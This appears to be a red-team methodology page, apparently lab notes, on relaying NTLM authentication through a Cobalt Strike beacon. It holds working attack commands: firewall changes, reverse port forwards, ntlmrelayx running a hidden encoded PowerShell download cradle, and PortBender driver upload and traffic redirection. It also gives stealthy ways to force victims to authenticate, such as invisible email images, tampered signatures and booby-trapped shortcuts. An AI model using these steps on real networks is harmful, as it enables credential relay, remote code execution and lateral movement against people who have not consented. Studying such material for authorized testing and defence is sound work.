NTLM Relaying Methodology w/ Cobalt
First, we need to obtain a SYSTEM beacon on the machine you will capture the SMB traffic on.
Next, allow those ports inbound on the Windows firewall.
beacon> powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
Then start two reverse port forwards - one for the SMB capture, the other for a PowerShell download cradle.
beacon> rportfwd 8445 localhost 445
beacon> rportfwd 8080 localhost 80
The final part of the setup is to start a SOCKS proxy that ntlmrelayx can use to send relay responses back into the network.
beacon> socks 1080
Now we can start ntlmrelayx.py listening for incoming connections on the Team Server. The -c parameter allows us to execute an arbitrary command on the target after authentication has succeeded.
attacker@ubuntu ~> sudo proxychains ntlmrelayx.py -t smb://{target IP} -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -enc {encoded command}'
The encoded command will download a powershell payload hosted in our Team Server (Scripted Web Delivery (S) Attack choosing smb listener) in port 80, but we need to point to the machine we have the beaco: http://compromised_machine:8080/b.
Then we will use PortBender, a reflective DLL and aggressor script specifically designed to help facilitate relaying through Cobalt Strike. It requires that the driver be located in the current working directory of the Beacon. It makes sense to use C:\Windows\System32\drivers since this is where most Windows drivers go.
beacon> cd C:\Windows\system32\drivers
beacon> upload C:\Tools\PortBender\WinDivert64.sys
Then go to Cobalt Strike > Script Manager and load PortBender.cna from C:\Tools\PortBender - this adds a new PortBender command to the console.
beacon> help PortBender
Execute PortBender to redirect traffic from 445 to port 8445.
beacon> PortBender redirect 445 8445
After that, once a user from the target machine makes an authetication attempt to the machine we have the beacon and we setted up the port forwards, PortBender log the connection and ntlmrelayx will spring into action.
We that occurs, ntlmrelayx reports that the command was executed - we can check the web log to confirm we received a hit.
Then we need to link to the beacon:
beacon> link dc-2.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
To stop PortBender:
jobs
jobkill {JID}
kill {PID}
Forcing NTLM Authentication
- 1x1 Images in Emails
If you have control over an inbox, you can send emails that have an invisible 1x1 image embedded in the body. When the recipients view the email in their mail client, such as Outlook, it will attempt to download the image over the UNC path and trigger an NTLM authentication attempt.
A sneakier means may be to modify the sender's email signature, so that even legitimate emails they send will trigger NTLM authentication from every recipient who reads them.
- Windows Shortcuts
A Windows shortcut can have multiple properties including a target, working directory and an icon. Creating a shortcut with the icon property pointing to a UNC path will trigger an NTLM authentication attempt when it's viewed in Explorer (it doesn't even have to be clicked). A good location for these is on publicly readable shares.
The easiest way to create a shortcut is with PowerShell.
- Remote Authentication Triggers
Tools such as SpoolSample(https://github.com/leechristensen/SpoolSample), SharpSystemTriggers(https://github.com/cube0x0/SharpSystemTriggers) and PetitPotam(https://github.com/topotam/PetitPotam) can force a computer into authenticating to us. These generally work via Microsoft RPC protocols, such as MS-RPRN and MS-EFS.
Last updated